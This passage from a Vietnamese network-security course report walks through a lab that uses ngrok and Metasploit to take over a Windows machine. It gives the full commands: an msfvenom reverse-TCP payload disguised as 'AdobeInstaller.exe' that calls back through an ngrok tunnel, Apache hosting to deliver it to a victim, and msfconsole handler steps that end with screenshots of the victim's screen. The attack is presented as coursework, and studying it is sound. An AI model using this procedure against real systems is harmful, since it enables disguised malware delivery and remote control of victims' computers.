Lab 2: ngrok + Metasploit Framework

Một phần của tài liệu Học Phần: AN TOÀN MẠNG Báo Cáo: Tìm hiểu về công cụ ngrok trong bộ Kali Tools (Trang 30 - 33)

CHƯƠNG 3 : MỘT SỐ BÀI LAB SỬ DỤNG NGROK

2. LAB 2: Tấn công chiếm quyền điều khiển thiết bị từ xa

2.2. Lab 2: ngrok + Metasploit Framework

Cơng cụ ngrok trong bài Lab này có 2 vai trị. Một là làm công cụ để phân tán mã độc đến nạn nhân. Hai là một cổng để máy nạn nhân có thể kết nối đến và kẻ tấn cơng cũng có thể kết nối đến đó để điều khiển máy nạn nhân. Để thực hiện được việc này trước hết ta phải sửa lại tệp cấu hình ở đường dẫn ~/.ngrok2/ngrok.yml như Hình 3.16.

Hình 3.16. Chụp màn hình file ~/.ngrok2/ngrok.yml

Chạy ngrok bằng lệnh ngrok start --all. Kết quả ta được 3 đường dẫn như Hình 3.17. trong đó lần lượt là các đường dẫn http đến cổng 80, https đến cổng 80 và tcp đến cổng 1234 và đường dẫn tcp có cả số hiệu cổng (trong hình là 12388).

Hình 3.17. Kết quả lệnh ngrok start --all

Tiếp đến ta cần tạo mã độc bằng lệnh sau: msfvenom -p windows/shell/reverse_tcp

LHOST=0.tcp.ngrok.io LPORT=12388 -f exe > AdobeInstaller.exe (trong đó giá trị LHOST là địa chỉ tcp của ngrok, LPORT là port tcp của ngrok và tên chương trình có thể đặt ngẫu nhiên có đi .exe trong bài Lab đặt tên là AdobeInstaller.exe)

30

Sau khi tạo xong mã độc ta chuyển vị trí của mã độc đó đến địa chỉ /var/www/html/ trên máy Kali Linux và chạy Apache bằng lệnh: service apache2 start lúc này ta đã có thể phân tán mã độc bằng đường dẫn http ở trên.

Hình 3.19. Nạn nhân tải phần mềm độc hại về qua ngrok

Tiếp tục là ta cần khởi độc Metasploit Framework và bắt đầu khai thác như sau: - Bước 1: Vào terminal của Kali Linux chạy lệnh: sudo msfconsole

- Bước 2: msf> use multi/handler - Bước 3: msf> set LHOST 0.0.0.0

- Bước 4: msf> set LPORT 1234 (chú thích: 1234 là cổng TCP trong file cấu hình) - Bước 5: msf> set payload windows/meterpreter/reverse_tcp

- Bước 6: msf> exploit

Cuối cùng là đợi cho nạn nhân chạy mã độc đã tải về kết quả như Hình 3.20.

31

Ta có thể thực hiện các lệnh shell trên máy này như điều khiển từ xa ví dụ như lệnh

screenshot (Hình 3.21 và Hình 3.22)

Hình 3.21. Thực hiện lệnh screenshot trên máy nạn nhân

32

Một phần của tài liệu Học Phần: AN TOÀN MẠNG Báo Cáo: Tìm hiểu về công cụ ngrok trong bộ Kali Tools (Trang 30 - 33)

Tải bản đầy đủ (PDF)

(36 trang)